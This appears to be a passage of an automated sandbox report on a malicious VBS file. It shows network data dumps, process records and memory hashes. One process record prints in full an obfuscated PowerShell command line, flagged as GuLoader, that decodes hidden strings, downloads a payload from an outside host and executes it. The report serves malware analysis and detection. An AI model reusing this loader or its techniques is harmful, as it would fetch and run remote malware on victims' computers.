          2024-05-28 06:08:59 UTC16384INData Raw: 4c 41 41 35 7a 32 6a 50 73 7a 47 74 41 70 76 64 6e 75 74 37 4f 58 41 6c 4c 6d 6b 2b 76 6b 37 33 77 45 50 4b 65 6c 4a 64 41 33 67 4a 52 4d 79 6b 66 51 62 41 69 79 69 53 61 42 34 56 2f 68 58 2f 2f 64 4a 7a 66 4a 7a 50 47 54 37 42 52 6f 53 79 48 42 61 73 6d 52 54 6e 41 4b 45 45 4c 44 76 64 34 62 76 4e 45 6a 4a 68 67 63 45 4f 53 55 31 65 42 2f 30 64 32 42 33 64 6f 5a 33 37 67 77 64 2b 62 56 63 59 77 59 75 62 56 54 4a 34 34 5a 57 35 58 42 55 2f 56 4d 53 4b 6a 50 38 77 2b 72 30 31 54 4d 64 33 67 41 61 52 6b 2f 38 41 33 6f 48 52 72 42 63 59 39 79 4a 48 6e 65 4e 48 6c 2f 4e 72 63 34 43 51 61 47 74 44 2f 5a 66 39 61 70 6d 7a 43 67 52 5a 79 59 73 6d 37 41 7a 61 4a 4f 4b 30 48 58 78 73 71 35 77 37 53 78 63 7a 30 77 43 62 6d 69 43 39 72 5a 6a 48 64 2b 67 41 73 32 58
          Data Ascii: LAA5z2jPszGtApvdnut7OXAlLmk+vk73wEPKelJdA3gJRMykfQbAiyiSaB4V/hX//dJzfJzPGT7BRoSyHBasmRTnAKEELDvd4bvNEjJhgcEOSU1eB/0d2B3doZ37gwd+bVcYwYubVTJ44ZW5XBU/VMSKjP8w+r01TMd3gAaRk/8A3oHRrBcY9yJHneNHl/Nrc4CQaGtD/Zf9apmzCgRZyYsm7AzaJOK0HXxsq5w7Sxcz0wCbmiC9rZjHd+gAs2X
          2024-05-28 06:08:59 UTC16384INData Raw: 77 78 30 46 54 57 6e 4c 77 68 52 43 64 61 49 6f 79 5a 79 39 76 55 4b 46 4e 50 41 52 54 67 57 56 62 38 68 57 64 6b 4f 36 51 72 6e 41 4d 61 70 2b 39 4d 65 76 58 56 67 62 6e 50 2f 77 7a 51 2b 71 39 73 65 33 54 48 30 75 75 2f 64 47 45 6f 5a 2b 77 2f 35 2f 71 41 59 71 67 62 4c 73 48 59 46 4c 54 54 6c 6f 75 2f 59 4c 2f 62 4e 30 73 45 47 67 52 6f 61 46 76 55 6a 44 30 48 7a 44 52 6b 4e 39 6e 56 71 59 33 30 4a 31 31 39 4d 46 65 77 56 56 6e 77 4a 46 76 6b 4a 31 65 42 6e 4f 68 51 43 41 51 6f 55 49 61 64 4a 45 42 5a 56 4c 55 5a 56 38 52 37 4e 44 66 52 31 61 63 49 64 43 64 55 37 67 6b 37 38 46 54 54 78 61 54 56 66 36 6a 51 43 31 51 6b 56 6c 4e 75 53 66 41 4b 52 43 68 64 31 42 62 30 45 46 6c 5a 5a 35 4b 48 6c 44 76 4a 6a 37 47 59 47 48 4e 61 42 62 38 76 6f 5a 78 37 63
          Data Ascii: wx0FTWnLwhRCdaIoyZy9vUKFNPARTgWVb8hWdkO6QrnAMap+9MevXVgbnP/wzQ+q9se3TH0uu/dGEoZ+w/5/qAYqgbLsHYFLTTlou/YL/bN0sEGgRoaFvUjD0HzDRkN9nVqY30J119MFewVVnwJFvkJ1eBnOhQCAQoUIadJEBZVLUZV8R7NDfR1acIdCdU7gk78FTTxaTVf6jQC1QkVlNuSfAKRChd1Bb0EFlZZ5KHlDvJj7GYGHNaBb8voZx7c
          2024-05-28 06:08:59 UTC16384INData Raw: 6b 63 65 45 66 42 36 49 45 6f 6b 42 48 34 63 72 35 59 45 42 56 63 46 47 68 44 73 61 6b 2f 62 36 4c 73 63 42 56 63 46 47 68 42 45 69 58 79 48 2f 62 6d 32 47 66 73 4f 2b 4c 37 58 6a 78 77 46 56 77 55 61 45 4f 54 4b 64 6a 42 68 43 76 37 72 75 67 37 6b 4a 56 63 46 47 68 41 73 30 42 75 4c 37 43 34 47 45 30 2f 51 75 76 50 2f 7a 4d 47 6c 54 70 63 65 30 53 76 47 67 37 50 2f 7a 35 61 30 4b 56 53 41 46 68 2b 46 65 67 63 44 44 43 59 64 54 65 55 62 4c 66 51 52 47 52 42 6b 53 34 67 43 4c 51 6e 5a 55 55 73 67 39 34 74 64 30 72 77 56 4f 57 7a 69 59 49 6b 49 37 38 42 79 77 52 6f 52 78 52 39 38 30 67 54 7a 48 74 46 7a 68 70 68 6d 35 52 6e 32 47 66 73 4e 76 6e 53 35 6c 77 6e 68 48 47 73 63 78 52 63 46 47 68 49 33 30 41 58 6b 59 52 70 59 46 79 2f 68 45 68 48 35 4c 4e 6f 54
          Data Ascii: kceEfB6IEokBH4cr5YEBVcFGhDsak/b6LscBVcFGhBEiXyH/bm2GfsO+L7XjxwFVwUaEOTKdjBhCv7rug7kJVcFGhAs0BuL7C4GE0/QuvP/zMGlTpce0SvGg7P/z5a0KVSAFh+FegcDDCYdTeUbLfQRGRBkS4gCLQnZUUsg94td0rwVOWziYIkI78BywRoRxR980gTzHtFzhphm5Rn2GfsNvnS5lwnhHGscxRcFGhI30AXkYRpYFy/hEhH5LNoT
          2024-05-28 06:08:59 UTC16384INData Raw: 50 4d 64 79 76 48 51 52 59 50 38 31 6a 39 75 68 56 73 64 43 6d 6c 71 36 39 66 66 46 56 4c 32 4f 46 74 49 78 57 6d 34 67 78 70 56 37 76 52 32 57 6a 78 6e 44 41 4c 4d 79 31 53 44 41 77 59 52 32 77 30 61 46 6a 6b 72 62 38 33 7a 44 52 74 66 46 6f 6f 33 2f 55 55 4b 31 2b 6a 45 4b 32 51 57 56 33 4d 55 32 7a 70 54 61 44 5a 6e 4b 57 52 6b 59 2b 72 2f 38 65 57 63 41 35 57 4e 75 6a 31 2b 66 51 7a 4e 78 6e 71 51 33 31 34 45 49 36 64 6e 57 5a 73 73 51 73 71 43 78 57 49 34 71 6c 72 7a 36 45 52 6b 41 72 4a 6a 39 50 56 46 4b 54 39 4c 41 79 58 4e 6f 58 45 4b 41 71 57 34 5a 39 41 57 51 34 37 37 69 72 30 4b 6f 70 6b 6d 63 51 67 31 77 6c 4f 77 68 70 32 74 59 63 67 77 34 76 76 34 6f 64 56 61 70 37 2f 51 78 55 43 77 69 65 42 2b 66 45 4a 36 43 4f 43 65 32 68 55 52 41 62 4e 72
          Data Ascii: PMdyvHQRYP81j9uhVsdCmlq69ffFVL2OFtIxWm4gxpV7vR2WjxnDALMy1SDAwYR2w0aFjkrb83zDRtfFoo3/UUK1+jEK2QWV3MU2zpTaDZnKWRkY+r/8eWcA5WNuj1+fQzNxnqQ314EI6dnWZssQsqCxWI4qlrz6ERkArJj9PVFKT9LAyXNoXEKAqW4Z9AWQ477ir0KopkmcQg1wlOwhp2tYcgw4vv4odVap7/QxUCwieB+fEJ6COCe2hURAbNr
          2024-05-28 06:08:59 UTC16384INData Raw: 70 63 4e 63 78 63 56 2b 39 30 41 31 68 51 48 2f 4d 4a 41 54 76 68 2f 44 56 2f 38 77 6c 53 5a 77 39 4d 64 33 65 63 37 37 55 52 6a 36 6e 6d 39 51 65 4b 54 49 4d 54 63 67 76 62 5a 43 72 61 61 30 59 36 75 38 69 55 4b 31 53 39 6d 78 47 75 4a 48 47 38 64 76 6b 65 65 61 33 70 58 4f 78 2f 6b 4b 69 30 65 45 66 73 7a 4a 57 43 34 38 75 55 64 47 43 58 35 65 2f 6a 7a 39 76 4b 35 48 68 77 47 33 51 72 79 47 33 4b 73 32 42 49 66 71 65 33 39 61 54 56 50 73 43 44 68 33 41 2f 2f 33 59 69 65 62 6e 5a 65 34 45 6b 4a 71 6f 42 4d 7a 5a 73 48 2f 37 32 4b 31 5a 59 31 58 44 66 4e 72 52 34 52 2b 65 68 42 5a 42 62 54 75 46 66 38 79 4b 5a 52 6b 53 63 64 31 69 64 66 45 72 66 38 71 69 46 32 64 46 78 63 50 38 32 74 48 68 48 35 43 4f 2f 44 56 55 55 61 45 63 55 34 33 31 49 45 38 4c 6b 31
          Data Ascii: pcNcxcV+90A1hQH/MJATvh/DV/8wlSZw9Md3ec77URj6nm9QeKTIMTcgvbZCraa0Y6u8iUK1S9mxGuJHG8dvkeea3pXOx/kKi0eEfszJWC48uUdGCX5e/jz9vK5HhwG3QryG3Ks2BIfqe39aTVPsCDh3A//3YiebnZe4EkJqoBMzZsH/72K1ZY1XDfNrR4R+ehBZBbTuFf8yKZRkScd1idfErf8qiF2dFxcP82tHhH5CO/DVUUaEcU431IE8Lk1
          2024-05-28 06:08:59 UTC16384INData Raw: 6d 38 4e 63 4a 4a 54 4e 4f 56 62 42 52 6f 52 78 42 48 58 66 66 73 50 66 6d 30 36 62 56 32 55 4e 39 7a 63 45 74 46 31 37 76 49 47 72 53 7a 43 62 59 38 65 77 57 68 6c 50 73 30 79 51 2f 5a 76 4c 77 65 34 46 6a 54 64 7a 50 66 42 43 74 53 4c 65 56 77 49 46 6a 52 34 56 69 66 46 43 68 66 54 7a 48 6c 54 53 34 6b 71 67 6a 57 42 65 49 41 47 4f 75 6b 49 76 36 68 59 4a 48 53 6f 4a 5a 55 6e 54 43 33 70 6d 7a 62 38 49 44 42 5a 44 78 54 6e 53 77 30 61 45 58 73 7a 43 4a 6c 67 38 75 64 71 47 6d 45 6d 46 5a 56 74 47 68 4f 4b 64 69 42 73 41 34 6c 67 63 30 69 54 48 73 46 72 4a 71 41 68 6f 7a 45 65 7a 5a 4d 4e 47 49 70 7a 5a 48 50 37 5a 69 45 69 38 4b 5a 75 33 50 5a 59 74 72 56 31 62 65 2b 6b 49 46 35 43 66 33 74 64 46 7a 2b 61 49 33 2f 69 46 44 41 68 4d 42 56 4c 6e 6d 39 63
          Data Ascii: m8NcJJTNOVbBRoRxBHXffsPfm06bV2UN9zcEtF17vIGrSzCbY8ewWhlPs0yQ/ZvLwe4FjTdzPfBCtSLeVwIFjR4VifFChfTzHlTS4kqgjWBeIAGOukIv6hYJHSoJZUnTC3pmzb8IDBZDxTnSw0aEXszCJlg8udqGmEmFZVtGhOKdiBsA4lgc0iTHsFrJqAhozEezZMNGIpzZHP7ZiEi8KZu3PZYtrV1be+kIF5Cf3tdFz+aI3/iFDAhMBVLnm9c
          2024-05-28 06:09:00 UTC16384INData Raw: 6e 30 6b 46 69 62 47 4f 4e 4e 56 43 73 64 56 77 4c 34 62 58 34 6b 71 6c 68 55 56 65 77 6c 55 4c 36 6f 75 4a 6d 4c 76 2f 73 4d 34 52 36 65 33 57 54 36 7a 54 74 77 6a 69 47 46 2b 4d 47 69 42 76 72 78 6b 4a 4a 67 6a 6d 42 33 58 55 2b 67 4f 72 70 76 7a 43 32 73 69 6e 78 70 6c 34 4d 42 77 35 75 4c 63 6b 64 61 58 44 52 69 56 48 75 74 76 2f 4b 42 46 6e 6d 76 2f 48 64 2f 61 79 33 79 6e 2f 4d 4c 6f 39 44 4c 49 57 50 49 4a 5a 6e 6c 70 4c 32 70 4d 57 4c 66 62 43 64 39 75 72 63 77 38 6c 73 68 65 42 61 4e 6f 6e 7a 79 39 66 7a 32 56 2f 77 74 75 38 70 62 68 63 4d 48 6e 48 48 43 68 4d 32 65 5a 68 64 76 38 31 53 65 48 50 56 66 33 6e 48 48 62 30 4b 67 45 65 2f 30 47 34 4c 52 69 64 52 6f 66 64 6c 65 6e 62 45 67 31 67 2b 36 52 2f 6c 38 48 46 49 2f 41 73 37 41 59 56 75 75 4b
          Data Ascii: n0kFibGONNVCsdVwL4bX4kqlhUVewlUL6ouJmLv/sM4R6e3WT6zTtwjiGF+MGiBvrxkJJgjmB3XU+gOrpvzC2sinxpl4MBw5uLckdaXDRiVHutv/KBFnmv/Hd/ay3yn/MLo9DLIWPIJZnlpL2pMWLfbCd9urcw8lsheBaNonzy9fz2V/wtu8pbhcMHnHHChM2eZhdv81SeHPVf3nHHb0KgEe/0G4LRidRofdlenbEg1g+6R/l8HFI/As7AYVuuK


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:02:08:54
          Start date:28/05/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs"
          Imagebase:0x7ff6fea10000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:02:08:54
          Start date:28/05/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa honFare,eLeis.s kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe ') ;$Gualaca=$Dervishlike[$Emarginate];}$Romantikers=288577;$Gabions=28318;Hadaway (Skdefrakker '.ksem$PastogBarmflEltr oAppelbU guiablundl Cr,m:CarduT ysteeMicroeIn,bum Garas Seto Parro= Cell AlkohGPens eConcet alle- TravCOptimoRug mnBrnd.tTppebeSammenmanertBrand Filic$WhitiSDi.idkSjakay Suspg,nimagBlueseOxla.mRe,eroApo.hrUnowneAnalylVedersHexad ');Hadaway (Skdefrakker 'Reawa$medvigAmneslUnsluo raksbForena,astblVicep:DiachCOversoHamardUndsleJern v P.coeB,oodlVegetoUnderpCoun.eBtteprChroms.epro Retha=Sup r Geusi[T rkiS AdelyCatabsAtmoctGgemmeBumblm Mil,.bl,odCProkuoMervrnF.siov.onpreFors rW opstBayre] unsp:Septi:KeirsF PercrOno aoTeak.mviru,B CiviaSolifs aarseLibe,6 .log4FreshSDemeatRavnerKajakisnowmn UdspgAmtsf(Ca.bu$ hydrTSongheforneeKnaphm,ovedsE.der)Jeete ');Hadaway (Skdefrakker 'Sekte$Impalg sa.ulBreadoFin,rbKodnia benzlVrik.: UnheGOxygesSinuot MillgMoiseiavnervkalasePrunkrSljfe Selv=Strm Grug[SaulqS andaySpejls To.ot SkoleTedesm Fnu . cardToutjueCalvixQasidtz,chi..eninEGennen NattcIntrooUdmaadVove,iAnvennMed.cgommbl] D.ss:Sneb,:Alb,rAFlustSA,owrC A.stIU.jetI diff.fodboGE,ilaeWeapotElec STyr,etbudstr BridiChappn Hel,gTol a(Abuli$ KarrCOktroo RededGrouneAfsnrvHjerteEarp l B leo ,oelp Ket.e Da arDivagsEmiel)Reall ');Hadaway (Skdefrakker 'opha,$Ce teg SkomlPlanloSka db StulahouselJeani: MateAPolionSids tH llwi Windn S iniVerd,hFecu,iPeartlTechniAnstdsPalm mS ici=Remin$Bed dG Ma,nsAc,tetBadesgNondeiLarynv MormePack.rAegir.Hive.s ConjuUdvikbKvad s silktantisrFodsaiUnprenGenregMiner( Dupl$ S.iaR Unhooskat.mmultiabetorn.hagotJunkii Lovmk A.kveK.rsfrAz ots Pseu,Gloss$TidskGsk.ldaHedesbMagtai OldkosanctnAd ecsDe.it) Op,u ');Hadaway $Antinihilism;"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:02:08:54
          Start date:28/05/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:4
          Start time:02:08:56
          Start date:28/05/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dsene.Kne && echo t"
          Imagebase:0x7ff6f47c0000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Reset < >
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0e02c1c07d5c2fee75b2ddc0ec97a4238661f4c9d8097ca285654f331d3d9c6b
            • Instruction ID: e2b482a88247e8da8652c7e652299de20f503ad26211211da459ab4cdd83187e
            • Opcode Fuzzy Hash: 0e02c1c07d5c2fee75b2ddc0ec97a4238661f4c9d8097ca285654f331d3d9c6b
            • Instruction Fuzzy Hash: 26D10122B0E78A4FE7EA86685CA11B47FD0EF93230B4840BFD18DC75D7D91DA8068361
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d51d522fb823f2823ba8a63fa703918e61b8217567500a5d830c1a3f35729f50
            • Instruction ID: 65d469d12b7d7f1f0789ebd692432b94ed2a8059b272ffc9085e453247d1d46c
            • Opcode Fuzzy Hash: d51d522fb823f2823ba8a63fa703918e61b8217567500a5d830c1a3f35729f50
            • Instruction Fuzzy Hash: 04E14322B0EA8A8FEB95DB284CB41B87FE1EF56214B1841BED18DC71D7DA1CA805D351
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d4f7ea432b4c8ead3fe34e6e6dd120d9212266e9bc19a393f40cdf6222be9e71
            • Instruction ID: 6d858a4ab3b2aa1dcfe1a627a10283c90cadb54324288d5c255917866e8f2c2f
            • Opcode Fuzzy Hash: d4f7ea432b4c8ead3fe34e6e6dd120d9212266e9bc19a393f40cdf6222be9e71
            • Instruction Fuzzy Hash: 92D15722B0EACA1FE7A6EB6848A41B97FE1EF16310B0841FFD55DC71D7DA18A805C351
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9c8087842c311b4f34431997cc7194008cc493bdc0d279f2420f751ef828b3a5
            • Instruction ID: 38d6339e1018e65a84d67d8232bc97920b22c3f2da368eab541d7873a21ddd7e
            • Opcode Fuzzy Hash: 9c8087842c311b4f34431997cc7194008cc493bdc0d279f2420f751ef828b3a5
            • Instruction Fuzzy Hash: 44B13422B0DB8A0FEBE59B2848A41B87FE1EF56220B4841BFD54DC75E7DE1CAC058351
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 816e8b482e346377d161f3463d64b97d10470aebec538752dedaaefa019987b4
            • Instruction ID: d95300cdf0d40a118138f03e6a9bdee1f539fa0b32efb892e16c197e7c1e43f6
            • Opcode Fuzzy Hash: 816e8b482e346377d161f3463d64b97d10470aebec538752dedaaefa019987b4
            • Instruction Fuzzy Hash: A8412662F0EA8A4FEBA5D72808F01B86BE1EF56214B5840BED19CC71D7DE1DE804A311
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4d4ec9ae1ee5030d2ee90adb3bbdb8fe90bfffdcc32774e37f3189b002513e3e
            • Instruction ID: 23385945a8907e79e52fb5fb38302b05f358b807b0834ce7636ce5ed5cb5e02e
            • Opcode Fuzzy Hash: 4d4ec9ae1ee5030d2ee90adb3bbdb8fe90bfffdcc32774e37f3189b002513e3e
            • Instruction Fuzzy Hash: E5312452F4EA9B0FE7E597681CB11B86EC2EF42234B5841BED51DC35D7ED0CA804A362
            Memory Dump Source
            • Source File: 00000002.00000002.2238952566.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
            • Instruction ID: 61d023836a036301be5b5b689af15e61005f9a1f3cd626edd26c956285a9f495
            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
            • Instruction Fuzzy Hash: 3B01677121CB0D4FD744EF4CE451AA5B7E0FB99364F10056DE58AC3651D636E881CB45
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2238952566.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: M_^
            • API String ID: 0-3807191693
            • Opcode ID: 570376722fc97e161d17ea50a40af4e67167c880f89c60cf17dd4f00f501c0ee
            • Instruction ID: 5be0ab471dc3e22702444cd048992aaf6b18c0007f5da759097aa57d53abb1f6
            • Opcode Fuzzy Hash: 570376722fc97e161d17ea50a40af4e67167c880f89c60cf17dd4f00f501c0ee
            • Instruction Fuzzy Hash: ADB19547B0F7C65AE792573C58BA0E97FA0DF5322470D02F7C6C4DA0A7AC4D180BA2A1
            Memory Dump Source
            • Source File: 00000002.00000002.2238952566.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a0e3d92c6f7f238b1707d72252191c8578794dcb7abd51c58a65abeee269ee13
            • Instruction ID: f8be5597e0b78ea70129b6a70034e1eb6834ec2dd54d7430479ed88337e9b484
            • Opcode Fuzzy Hash: a0e3d92c6f7f238b1707d72252191c8578794dcb7abd51c58a65abeee269ee13
            • Instruction Fuzzy Hash: 43121632B08A5A8FDB94EBACD4A19E97BF0FF55320F080177D549C7153DA78A8468790
            Memory Dump Source
            • Source File: 00000002.00000002.2238952566.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
